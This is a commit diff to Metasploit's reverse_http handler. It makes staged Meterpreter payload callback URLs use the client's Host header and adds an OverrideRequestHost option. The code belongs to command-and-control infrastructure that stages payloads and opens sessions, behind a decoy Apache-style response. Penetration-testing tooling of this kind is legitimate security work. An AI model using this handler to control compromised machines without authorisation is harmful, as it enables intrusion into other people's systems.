Lands #4912, http handlers will use the client's Host header by default.

2015-03-11 23:23:37 -05:00 · 2015-03-11 23:23:37 -05:00 · cdef992d6b
parent 215c209f88 dfbc50ff47
commit cdef992d6b
1 changed files with 12 additions and 9 deletions
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@ -53,6 +53,7 @@ module ReverseHttp
        OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
+        OptBool.new('OverrideRequestHost', [ false, 'Forces clients to connect to LHOST:LPORT instead of keeping original payload host', false ]),
        OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ])
      ], Msf::Handler::ReverseHttp)
  end
@ -92,13 +93,15 @@ module ReverseHttp
  # addresses.
  #
  # @return [String] A URI of the form +scheme://host:port/+
-  def payload_uri
-    if ipv6?
-      callback_host = "[#{datastore['LHOST']}]"
+  def payload_uri(req)
+    if req and req.headers and req.headers['Host'] and not datastore['OverrideRequestHost']
+      callback_host = req.headers['Host']
+    elsif ipv6?
+      callback_host = "[#{datastore['LHOST']}]:#{datastore['LPORT']}"
    else
-      callback_host = datastore['LHOST']
+      callback_host = "#{datastore['LHOST']}:#{datastore['LPORT']}"
    end
-    "#{scheme}://#{callback_host}:#{datastore['LPORT']}/"
+    "#{scheme}://#{callback_host}/"
  end

  # Use the {#refname} to determine whether this handler uses SSL or not
@ -186,7 +189,7 @@ protected
    case uri_match
      when /^\/INITPY/
        conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-        url = payload_uri + conn_id + '/'
+        url = payload_uri(req) + conn_id + '/'

        blob = ""
        blob << obj.generate_stage
@ -221,7 +224,7 @@ protected

      when /^\/INITJM/
        conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-        url = payload_uri + conn_id + "/\x00"
+        url = payload_uri(req) + conn_id + "/\x00"

        blob = ""
        blob << obj.generate_stage
@ -249,7 +252,7 @@ protected

      when /^\/A?INITM?/
        conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-        url = payload_uri + conn_id + "/\x00"
+        url = payload_uri(req) + conn_id + "/\x00"

        print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...")
        resp['Content-Type'] = 'application/octet-stream'
@ -294,7 +297,7 @@ protected
        create_session(cli, {
          :passive_dispatcher => obj.service,
          :conn_id            => conn_id,
-          :url                => payload_uri + conn_id + "/\x00",
+          :url                => payload_uri(req) + conn_id + "/\x00",
          :expiration         => datastore['SessionExpirationTimeout'].to_i,
          :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
          :ssl                => ssl?,